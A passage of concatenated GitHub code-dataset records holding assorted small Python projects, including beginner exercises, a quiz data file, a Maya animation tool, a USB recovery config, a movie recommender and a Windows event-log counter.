'r') #파일을 먼저 읽어 옴\n body = f.read() #읽어 온 파일을 body에 저장\n f.close()\n\n body = body.replace('java', 'python') #body값을 replace 함수로 값을 변경\n f = open('test.txt', 'w')\n f.write(body)\n f.close()\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n","repo_name":"Choijonghun/jhchoi_gitTest","sub_path":"4강_연습문제/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1641475849","text":"try:\n numero = int(input(\"Ingresa un número entero y positivo: \"))\nexcept:\n print(\"Número introducido inválido.\")\n exit()\n\ni = 0\n\nif numero <= 0:\n print(\"Número no válido\")\n exit()\n\nprint(\"--La tabla del {}--\".format(numero))\nwhile i < 10:\n i += 1\n print(\" {} * {} = {}\".format(numero , i , numero * i))","repo_name":"Adolfo-Cuevas28/Python_Adolf","sub_path":"11. Bucles/Ejercicio1While.py","file_name":"Ejercicio1While.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30846784241","text":"from __future__ import division\nfrom jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound\ndef run(environment):\n name = 'source/snippets/grids/landing.js'\n\n def root(context, environment=environment):\n if 0: yield None\n yield u\"\\njsonData = null\\n\\nfunction spiPreProcess(data)\\n{\\n\\tjsonData = data\\n\\n\\trecords = []\\n\\tfor (index in data.response.records)\\n\\t{\\n\\t\\trecords.push({'cell':[data.response.records[index].properties.title]});\\n\\t}\\n\\t\\n\\treturn {'total':records.length, 'page':1, 'rows':records};\\n}\"\n\n blocks = {}\n debug_info = ''\n return locals()","repo_name":"sgammon/StonerHub","sub_path":"templates/compiled/snippets/grids/landing.py","file_name":"landing.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17382909216","text":"import classes\n\nquestions_text = [\n \"Which is the largest country in the world?\",\n \"How many days are there in a leap year?\",\n \"Which one of these four birds has the longest beak and feet?\",\n \"What is the national currency of the United States of America (USA)?\",\n \"Guido van Rossum in 1991 designed which language?\",\n \"Finish the sequence: 9, 18, 27, _?\",\n \"Which one is the first fully supported 64-bit operating system?\",\n \"Which animal is called the king of the jungle?\",\n \"what time corresponds to 23:23 hours ?\",\n \"Which team has won most number of IPL matches ?\",\n \"Which is the largest planet in our Solar system?\",\n \"How many continents are there in the world?\",\n \"How many years are there in one Millenium?\",\n \"ipad is manufactured by?\",\n \"Who founded Microsoft?\",\n]\n\nfirst_option = [\n \"India\",\n \"354\",\n \"Heron\",\n \"Euro\",\n \"Javascript\",\n \"36\",\n \"Windows 7\",\n \"Elephant\",\n \"11:23PM\",\n \"KKR\",\n \"Earth\",\n \"8\",\n \"100 years\",\n \"Google\",\n \"Monty Ritz\",\n]\n\nsecond_option = [\n \"USA\",\n \"366\",\n \"Parrot\",\n \"Peso \",\n \"Python\",\n \"34\",\n \"Linux\",\n \"Lion\",\n \"11.11PM\",\n \"CSK\",\n \"Uranus\",\n \"5\",\n \"50 years\",\n \"Microsoft\",\n \"Danis Lio\",\n]\n\nthird_option = [\n \"China\",\n \"365\",\n \"Crow\",\n \"Dollar\",\n \"Java\",\n \"30\",\n \"Mac\",\n \"Tiger\",\n \"7:23PM\",\n \"MI\",\n \"Mars\",\n \"7\",\n \"500 years\",\n \"Amazon\",\n \"Bill Gates\",\n]\n\nfourth_option = [\n \"Russia\",\n \"420\",\n \"Pigeon\",\n \"Yen\",\n \"C++\",\n \"37\",\n \"Windows XP\",\n \"Cow\",\n \"9.11PM\",\n \"RCB\",\n \"Jupiter\",\n \"6\",\n \"1000 years\",\n \"Apple\",\n \"Jeff Bezos\",\n]\n\ncorrect_answers = [\n \"Russia\",\n \"366\",\n \"Heron\",\n \"Dollar\",\n \"Python\",\n \"36\",\n \"Linux\",\n \"Lion\",\n \"7:23PM\",\n \"MI\",\n \"Jupiter\",\n \"7\",\n \"1000 years\",\n \"Apple\",\n \"Bill Gates\",\n]\n\nquestions = []\n\nfor i in range(len(questions_text)):\n questions.append(\n classes.Question(\n questions_text[i],\n first_option[i],\n second_option[i],\n third_option[i],\n fourth_option[i],\n correct_answers[i],\n )\n )\n","repo_name":"Mannatpreet22/trivia-quiz","sub_path":"KBC Quiz Game/kbc_data.py","file_name":"kbc_data.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71486519688","text":"# coding=utf-8\nimport os\nfrom imp import reload\n\nfrom animation import common\nfrom pymel import core as pm\n\nreload(common)\n\n\nclass TransferAnimTool(common.Singleton):\n \"\"\"\n 动画传递工具\n\n 将旧版的表情动画传递到新版表情控制器面板上面的一次性工具\n\n \"\"\"\n\n def __init__(self):\n super(TransferAnimTool, self).__init__()\n\n self.template_path = \"\"\n self.namespace = \"\"\n\n self.initialize()\n self.show()\n\n def show(self):\n if pm.window(\"transferAnimTool\", ex=True):\n pm.deleteUI(\"transferAnimTool\")\n pm.window(\n \"transferAnimTool\",\n title=u\"动画传递助手\",\n cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n layout = pm.columnLayout(adj=1, rs=5)\n pm.textFieldButtonGrp(\n \"templateTextField\",\n label=u\"模板文件\",\n bl=u\"指定文件\",\n cw3=[70, 200, 100],\n adj=2,\n text=self.template_path,\n bc=lambda *args: self.load_template_file())\n pm.textFieldGrp(\n \"namespaceTextField\",\n label=\"Namespace:\",\n cw2=[70, 200],\n adj=2,\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.button(label=u\"传递动画!\", c=lambda *args: self.transfer_anim())\n pm.setParent(\"..\")\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (layout, 'top', 10),\n (layout, 'left', 10),\n (layout, 'right', 10),\n (layout, 'bottom', 10),\n # (btn, 'left', 10),\n # (btn, 'right', 10),\n\n # (output_frame, 'left', 10),\n # (output_frame, 'right', 10),\n # (output_frame, 'bottom', 10),\n ],\n attachControl=[\n # (btn, 'top', 5, layout),\n # (output_frame, 'top', 5, btn),\n # (file_export_list_frame, 'bottom', 5, export_options_frame),\n # (export_options_frame, 'bottom', 5, execute_button),\n ])\n\n pm.showWindow(\"transferAnimTool\")\n\n def close_main_window(self):\n pm.optionVar(sv=('transferAnimToolTemplatePath', self.template_path))\n pm.optionVar(sv=('transferAnimToolNamespace', self.namespace))\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferAnimToolTemplatePath'):\n self.template_path = pm.optionVar(\n q='transferAnimToolTemplatePath')\n\n if pm.optionVar(q='transferAnimToolNamespace'):\n self.namespace = pm.optionVar(\n q='transferAnimToolNamespace')\n\n def load_template_file(self):\n json_location = pm.fileDialog2(\n dialogStyle=2, fileMode=1, okc=u\"选择模板配置文件\")\n if json_location:\n pm.textFieldButtonGrp(\n 'templateTextField', e=True, text=json_location[0])\n self.template_path = json_location[0]\n return\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\n \"namespaceTextField\", q=True, text=True)\n\n def transfer_anim(self):\n dict_data = common.read_json(file_path=self.template_path)\n print(dict_data)\n # print self.namespace\n source_attrs = dict_data.keys()\n print(source_attrs)\n for source_attr in source_attrs:\n source_anim_curves = pm.PyNode(\n \"%s%s\" % (self.namespace, source_attr)).inputs()\n if len(source_anim_curves) > 0:\n target_anim_curve = source_anim_curves[0].controller_name()\n # print target_anim_curve\n # print source_attr.split(\".\")[0]\n # print dict_data[source_attr].split(\".\")[0]\n target_anim_curve = target_anim_curve.replace(\n source_attr.split(\".\")[0],\n dict_data[source_attr].split(\".\")[0])\n\n new_anim_curve = pm.duplicate(\n source_anim_curves[0],\n name=target_anim_curve)\n\n pm.connectAttr(\n \"%s.output\" % new_anim_curve[0],\n \"%s%s\" % (self.namespace, dict_data[source_attr]),\n f=True)\n\n print(\"Done!\")\n\n return\n\n\nclass TemplateBuilder(common.Singleton):\n \"\"\"\n 属性传递模板创建工具\n\n 传递属性工具依赖属性模板(JSON)文件,\n 这个模板文件里面包含数据来源(source)对象控制器的名字和属性,\n 接受数据的目标(target)对象控制器的名字和属性\n\n \"\"\"\n\n def __init__(self):\n super(TemplateBuilder, self).__init__()\n\n self.output_path = \"\"\n self.namespace = \"\"\n self.output_items = []\n\n self.initialize()\n self.show()\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferOutputPath'):\n self.output_path = pm.optionVar(\n q='transferOutputPath')\n\n if pm.optionVar(q='transferNamespace'):\n self.namespace = pm.optionVar(\n q='transferNamespace')\n\n def show(self):\n if pm.window(\"templateBuilder\", ex=True):\n pm.deleteUI(\"templateBuilder\")\n pm.window(\n \"templateBuilder\",\n title=u\"模板创建助手\", cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n mode_options_grp = self.mode_options_grp()\n\n layout = pm.rowColumnLayout(nc=2, w=520)\n self.source_attr_list_column()\n self.target_attr_list_column()\n pm.setParent(\"..\")\n\n btn = pm.button(\n label=u\"自动比对\", w=504,\n c=lambda *args: self.comparison_attrs())\n\n output_frame = self.template_item_list()\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (mode_options_grp, 'top', 10),\n (mode_options_grp, 'left', 10),\n (layout, 'left', 10),\n (btn, 'left', 10),\n (output_frame, 'left', 10),\n (output_frame, 'bottom', 10)],\n attachControl=[\n (layout, 'top', 5, mode_options_grp),\n (btn, 'top', 5, layout),\n (output_frame, 'top', 5, btn)])\n\n pm.showWindow(\"templateBuilder\")\n\n def template_item_list(self):\n frame_layout = pm.frameLayout(label=\"Output Frame\", mh=5, w=504)\n pm.textFieldGrp(\n \"namespaceField\",\n adj=2, label=\"Namespace:\",\n cw2=[80, 200],\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.textFieldButtonGrp(\n \"outputPathField\",\n label=\"Output Path:\",\n bl=\"Set Path\",\n adj=2,\n text=self.output_path,\n cw3=[80, 200, 100],\n bc=lambda *args: self.set_output_location())\n pm.textScrollList(\"outputItemScrollList\", a=self.output_items)\n pm.popupMenu()\n pm.menuItem(\n label=u\"载入数据\", c=lambda *args: self.load_dict_data())\n pm.menuItem(\n label=u\"移除选择\", c=lambda *args: self.remove_selected_item())\n pm.menuItem(\n label=u\"移除所有\", c=lambda *args: self.remove_all_item())\n pm.button(label=\"Build\", c=lambda *args: self.write_output())\n pm.setParent(\"..\")\n return frame_layout\n\n def mode_options_grp(self):\n options_grp = pm.optionMenuGrp(\n label=u'模式', cw2=[24, 200], adj=2)\n pm.menuItem(label=u'属性——属性')\n pm.menuItem(label=u'属性——对象')\n return options_grp\n\n def target_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Target Object:\",\n al=\"left\")\n pm.textField(\"targetObjectField\", w=250)\n pm.textScrollList(\n \"targetObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"targetObjectAttrScrollList\"),\n dcc=lambda *args: self.append_output_item())\n pm.button(\n \"loadTargetBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"targetObjectField\",\n extra_widget=\"targetObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n def source_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Source Object:\",\n al=\"left\")\n pm.textField(\"sourceObjectField\", w=250)\n pm.textScrollList(\n \"sourceObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"sourceObjectAttrScrollList\"))\n pm.button(\n \"loadSourceBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"sourceObjectField\",\n extra_widget=\"sourceObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n @staticmethod\n def remove_selected_item():\n selected_item = pm.textScrollList('outputItemScrollList', q=True,\n si=True)\n for item in selected_item:\n pm.textScrollList('outputItemScrollList', e=True, ri=item)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def remove_all_item():\n pm.textScrollList('outputItemScrollList', e=True, ra=True)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def load_controller(widget=None, extra_widget=None):\n controller = pm.ls(sl=True)\n if len(controller) > 1 or len(controller) < 1:\n pm.error(u\"请选择单个控制器\")\n else:\n pm.textField(widget, e=True, text=controller[0])\n\n attr_list = pm.listAttr(controller[0], k=True)\n pm.textScrollList(extra_widget, e=True, ra=True)\n pm.textScrollList(extra_widget, e=True, a=attr_list)\n\n @staticmethod\n def append_output_item():\n # todo: bug fix - 属性应该是一对一,当前是一对多,后续版本应该强制验证\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n key = \"%s.%s\" % (\n source_controller,\n pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n value = \"%s.%s\" % (\n target_controller,\n pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n item = \"%s:%s\" % (key, value)\n print(item)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n\n print(\"--------------\")\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n def set_output_location(self):\n output_path = pm.fileDialog2(\n dialogStyle=2,\n fileFilter=\"JSON File (*.json);;\",\n fileMode=0, okc=u\"保存文件\")\n if output_path:\n pm.textFieldButtonGrp(\n \"outputPathField\", e=True,\n text=output_path[0])\n self.output_path = output_path[0]\n return\n\n def close_main_window(self):\n pm.optionVar(sv=('transferOutputPath', self.output_path))\n pm.optionVar(sv=('transferNamespace', self.namespace))\n\n def write_output(self):\n output_map = {}\n\n output_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n for output_item in output_items:\n key, value = output_item.split(\":\")\n print(key, value)\n output_map[key] = value\n\n common.write_json(dict_data=output_map, file_path=self.output_path)\n\n print(\"Done!\")\n\n def load_dict_data(self):\n item_list = []\n if os.path.isfile(self.output_path):\n dict_data = common.read_json(file_path=self.output_path)\n for item_key in dict_data.keys():\n item_list.append(\"%s%s:%s%s\" % (\n self.namespace,\n item_key,\n self.namespace,\n dict_data[item_key]))\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item_list)\n\n @staticmethod\n def print_selected_item(widget=None):\n print(pm.textScrollList(widget, q=True, si=True))\n\n @staticmethod\n def comparison_attrs():\n source_attrs = pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, ai=True)\n target_attrs = pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, ai=True)\n\n comparison_attrs = list(\n set(source_attrs).intersection(set(target_attrs)))\n print(comparison_attrs)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n\n for attr in comparison_attrs:\n key = \"%s.%s\" % (source_controller, attr)\n value = \"%s.%s\" % (target_controller, attr)\n item = \"%s:%s\" % (key, value)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n","repo_name":"jzboylxj/XDLibs","sub_path":"animation/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":14613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20281370678","text":"import yaml\nfrom snagrecover.utils import cli_error,parse_usb\nimport logging\nlogger = logging.getLogger(\"snagrecover\")\nimport os\n\ndefault_usb_ids = {\n\t# default ROM code USB IDs\n\t\"stm32mp1\": (0x0483,0xdf11),\n\t\"sama5\": (0x03eb,0x6124),\n\t\"sunxi\": (0x1f3a,0xefe8),\n\t\"am62x\": (0x0451,0x6165),\n\t\"imx\": {\n\t\t\"imx8qxp\": (0x1fc9,0x012f),\n\t\t\"imx8qm\": (0x1fc9,0x0129),\n\t\t\"imx8dxl\": (0x1fc9,0x0147),\n\t\t\"imx28\": (0x15a2,0x004f),\n\t\t\"imx815\": (0x1fc9,0x013e),\n\t\t\"imx865\": (\"SDPS\",0x1fc9),\n\t\t\"imx93\": (0x1fc9,0x014e),\n\t\t\"imx7d\": (0x15a2,0x0076),\n\t\t\"imx6q\": (0x15a2,0x0054),\n\t\t\"imx6d\": (0x15a2,0x0061),\n\t\t\"imx6sl\": (0x15a2,0x0063),\n\t\t\"imx6sx\": (0x15a2,0x0071),\n\t\t\"imx6ul\": (0x15a2,0x007d),\n\t\t\"imx6ull\": (0x15a2,0x0080),\n\t\t\"imx6sll\": (0x1fc9,0x0128),\n\t\t\"imx7ulp\": (0x1fc9,0x0126),\n\t\t\"imxrt106x\": (0x1fc9,0x0135),\n\t\t\"imx8mm\": (0x1fc9,0x0134),\n\t\t\"imx8mq\": (0x1fc9,0x012b),\n\t\t\"imx53\" : (0x15a2,0x004e),\n\t}\n}\n\nrecovery_config = {} # Global immutable config to be initialized with CLI args\n\ndef get_family(soc_model: str) -> str:\n with open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n socs = yaml.safe_load(file)\n family = {**socs[\"tested\"], **socs[\"untested\"]}[soc_model][\"family\"]\n return family\n\ndef check_soc_model(soc_model: str):\n\twith open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n\t\tsocs = yaml.safe_load(file)\n\tif soc_model not in {**socs[\"tested\"], **socs[\"untested\"]}:\n\t\tcli_error(f\"unsupported soc model {soc_model}, supported socs: \\n\" + yaml.dump(socs))\n\treturn None\n\ndef init_config(args: list):\n\t# this is the only time that config.recovery_config should be modified!\n\t# get soc model\n\tsoc_model = args.soc\n\tcheck_soc_model(soc_model)\n\trecovery_config.update({\"soc_model\": soc_model})\n\tsoc_family = get_family(soc_model)\n\trecovery_config.update({\"soc_family\": soc_family})\n\tif soc_family != \"am335x\":\n\t\tif args.rom_usb is None:\n\t\t\tif soc_family == \"imx\":\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[\"imx\"][soc_model]\n\t\t\telse:\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[soc_family]\n\t\telse:\n\t\t\trecovery_config[\"rom_usb\"] = parse_usb(args.rom_usb)\n\n\tfw_configs = {}\n\tif args.firmware:\n\t\tfor fw in args.firmware:\n\t\t\tif not isinstance(fw, dict):\n\t\t\t\tcli_error(\"firmware config to CLI did not evaluate to Python3 dict: {fw}\")\n\t\t\tfw_configs = {**fw_configs, **fw}\n\t\trecovery_config[\"firmware\"] = fw_configs\n\t\tif args.firmware_file:\n\t\t\tprint(\"Warning: You passed firmware configuration via files AND direct CLI arguments.\")\n\tif args.firmware_file:\n\t\t# get firmware configs\n\t\tfor path in args.firmware_file:\n\t\t\twith open(path, \"r\") as file:\n\t\t\t\tfw_configs = {**fw_configs, **yaml.safe_load(file)}\n\t\tif not isinstance(fw_configs, dict):\n\t\t\tcli_error(f\"firmware config passed to CLI did not evaluate to dict: {fw_configs}\")\n\t\trecovery_config[\"firmware\"] = fw_configs\n\n\t# store input arguments in config\n\trecovery_config[\"args\"] = vars(args)\n\tlogger.debug(f\"recovery_config:{str(recovery_config)}\")\n\n","repo_name":"bootlin/snagboot","sub_path":"src/snagrecover/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"16"} +{"seq_id":"5054389047","text":"import luserver.scripts.general.flower as script\r\nfrom luserver.components.mission import TaskType\r\n\r\nclass ScriptComponent(script.ScriptComponent):\r\n\tdef on_skill_event(self, caster, event_name):\r\n\t\tif event_name == \"waterspray\":\r\n\t\t\tif \"blooming\" not in self.script_network_vars:\r\n\t\t\t\tself.object.physics.drop_loot(12317, caster)\r\n\t\t\t\tcaster.char.mission.update_mission_task(TaskType.Script, self.object.lot, mission_id=1136)\r\n\r\n\t\tsuper().on_skill_event(caster, event_name)\r\n","repo_name":"lcdr/luserver","sub_path":"luserver/scripts/crux_prime/aura_blossom_flower.py","file_name":"aura_blossom_flower.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"40700159998","text":"from typing import List\n\n\nclass AverageOfSubarrayOfSizeK:\n # Time complexity: O(N * K)\n def findAveragesBruteForce(self, k: int, arr: List[int]) -> List[float]:\n result = []\n for i in range(len(arr) - k + 1):\n _sum = 0\n for j in range(i, i + k):\n _sum += arr[j]\n result.append(_sum / k)\n return result\n\n # Time complexity: O(N)\n def findAverages(self, k: int, arr: List[int]) -> List[float]:\n result = []\n _sum = 0\n for i in range(len(arr)):\n _sum += arr[i]\n if i >= k - 1:\n result.append(_sum / k)\n _sum -= arr[i - k + 1]\n\n return result\n\n\nif __name__ == \"__main__\":\n print(AverageOfSubarrayOfSizeK().findAverages(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n print(AverageOfSubarrayOfSizeK().findAveragesBruteForce(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n","repo_name":"DenysLins/code-interview","sub_path":"patterns-for-coding-interview/sliding-window/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1821189371","text":"import tkinter as tk\r\nimport sounddevice as sd\r\nimport wavio\r\nimport os\r\nfrom datetime import datetime\r\n\r\nclass VoiceRecorderApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Voice Recorder App\")\r\n\r\n self.is_recording = False\r\n self.recording_filename = None\r\n\r\n # UI components\r\n self.record_button = tk.Button(root, text=\"Record\", command=self.toggle_recording)\r\n self.record_button.pack(pady=10)\r\n\r\n self.save_button = tk.Button(root, text=\"Save Recording\", command=self.save_recording, state=tk.DISABLED)\r\n self.save_button.pack(pady=5)\r\n\r\n # Start the GUI event loop\r\n root.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n root.mainloop()\r\n\r\n def toggle_recording(self):\r\n if not self.is_recording:\r\n self.start_recording()\r\n else:\r\n self.stop_recording()\r\n\r\n def start_recording(self):\r\n self.is_recording = True\r\n self.record_button.config(text=\"Stop Recording\")\r\n self.save_button.config(state=tk.DISABLED)\r\n\r\n # Set up audio recording\r\n self.recording_filename = f\"/Users\\logan\\Desktop{datetime.now().strftime('%Y%m%d_%H%M%S')}.wav\"\r\n self.stream = sd.InputStream(callback=self.audio_callback)\r\n self.stream.start()\r\n\r\n def stop_recording(self):\r\n self.is_recording = False\r\n self.record_button.config(text=\"Record\")\r\n self.save_button.config(state=tk.NORMAL)\r\n\r\n # Stop audio recording\r\n self.stream.stop()\r\n self.stream.close()\r\n\r\n def audio_callback(self, indata, frames, time, status):\r\n if status:\r\n print(status)\r\n wavio.write(self.recording_filename, indata, 44100, sampwidth=3)\r\n\r\n def save_recording(self):\r\n save_path = tk.filedialog.asksaveasfilename(defaultextension=\".wav\", filetypes=[(\"WAV files\", \"*.wav\")])\r\n if save_path:\r\n os.rename(self.recording_filename, save_path)\r\n tk.messagebox.showinfo(\"Save Recording\", \"Recording saved successfully!\")\r\n\r\n def on_closing(self):\r\n if self.is_recording:\r\n self.stop_recording()\r\n self.root.destroy()\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = VoiceRecorderApp(root)\r\n","repo_name":"Mxlzz31/CVIP","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11811999918","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise\nfrom scipy.sparse import csr_matrix\nimport sklearn\nimport pickle\nfrom utils import make_user_vector\n\nimport os\n#%%\n# movie given by the user\nquery = {\n # movieId, rating\n 4470:5,\n 48:5,\n 594:5,\n 27619:5,\n 152081:5,\n 595:5,\n 616:5,\n 1029:5\n}\n\n#%%\nratings = pd.read_csv('data/ratings.csv')\nmovies = pd.read_csv('data/movies.csv')\n#%%\nmovies.set_index('movieId').loc[query.keys()]\n#%%\nratings_per_movie = ratings.groupby('movieId')['rating'].count()\npopular_movies = ratings_per_movie[ratings_per_movie>30]\nratings = ratings.loc[ratings['movieId'].isin(popular_movies.index)]\nR = csr_matrix((ratings['rating'], (ratings['userId'], ratings['movieId'])))\n#%%Training\nsorted(sklearn.neighbors.VALID_METRICS_SPARSE['brute'])\n#%%\nmodel_nn = NearestNeighbors(metric='cosine')\nmodel_nn.fit(R)\n\n#%%Save the trained model\nwith open('./nn_recommender.pkl', 'wb') as file:\n pickle.dump(model_nn, file)\n\n#%%read the model from hard drive\nwith open('./nn_recommender.pkl', 'rb') as file:\n model_nn = pickle.load(file)\n\n#%%\nshape = model_nn.n_features_in_\nuser_vec = make_user_vector(query, shape)\n\n#%%calculate the score\ndistances, userIds = model_nn.kneighbors(user_vec, n_neighbors=10, return_distance=True)\ndistances = distances[0]\nuserIds = userIds[0]\n\n#%% extract the ratings of the similar users from the original data\nneighborhood = ratings.set_index('userId').loc[userIds]\n\n#%%score calculation\nscores = neighborhood.groupby('movieId')['rating'].mean()\n\n#%% give recommendations\nscores.loc[scores.index.isin(query.keys())] = 0\nscores.sort_values(ascending=False, inplace=True)\n#%%\nscores_10 = scores.head(10)\nrecommendations = movies.set_index('movieId').loc[scores_10.index]","repo_name":"damoon15/movie_recommander","sub_path":"model_train_neighborhood_recommender.py","file_name":"model_train_neighborhood_recommender.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42937621482","text":"\"\"\"\nCode to watch the best bot play Snake\n\"\"\"\nimport pickle\nimport game, bot\nimport neat\nimport numpy as np\n\ndef preset_food_pos_maker(positions):\n \"\"\"\n Returns a function that returns the next position in :positions: each time it's called\n :param positions: list of tuples\n :return: function with no args\n \"\"\"\n pos = positions\n def preset_food_pos():\n try:\n return pos.pop(0)\n except Exception:\n print('out of given positions; using random ones')\n return game.rand_pos()\n return preset_food_pos\n\ndef watch_best(genome_file, config_file, food_pos_file):\n \"\"\"\n Watch a particularly good game of Snake\n \"\"\"\n # Import best game data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n food_positions = pickle.load(open(food_pos_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n ## Play game\n # Must be true to observe game being played\n game.WATCH = True\n game.USE_FRAMERATE = True\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = preset_food_pos_maker(food_positions)\n\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\n\ndef watch_games(genome_file, config_file):\n \"\"\"\n Loads the given genome from file and plays Snake repeatedly, using that genome to control the bot\n :param genome_file: name of genome file\n \"\"\"\n # Import best genome data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n # Must be true to observe game being played\n # game.WATCH = True\n # game.USE_FRAMERATE = True\n\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = game.rand_pos\n\n while True:\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\ngame.FRAMERATE = 30\nwatch_best('best_genome.pkl', 'best_config.pkl', 'best_food_pos.pkl')\nwatch_games('best_genome.pkl', 'best_config.pkl')","repo_name":"nglaze00/Snake-reinforcement-learning","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7567085767","text":"from multiprocessing import Process, Manager\nimport Evtx.Evtx as evtx\nfrom bs4 import BeautifulSoup\n\npath = \"C:\\Windows\\System32\\winevt\\Logs\\Security.evtx\"\nEventCount = 0\nAllEvent = 0\nwith evtx.Evtx(path) as log:\n for x in log.records():\n AllEvent +=1\n\ndef CountTotal(d,MinNum,MaxNum):\n global EventCount\n print(MinNum,MaxNum)\n try:\n with evtx.Evtx(path) as log:\n for y in range(MinNum, MaxNum):\n print(\"Numbering : \",y)\n GetOne = log.get_record(1)\n print(GetOne)\n # GetOne = log.get_record(int(y))\n # soup = BeautifulSoup(GetOne.xml(), \"html.parser\")\n # System_ = soup.find(\"system\")\n # EventId = int(System_.find(\"eventid\").text)\n # if EventId == 4624:\n # EventCount += 1\n # 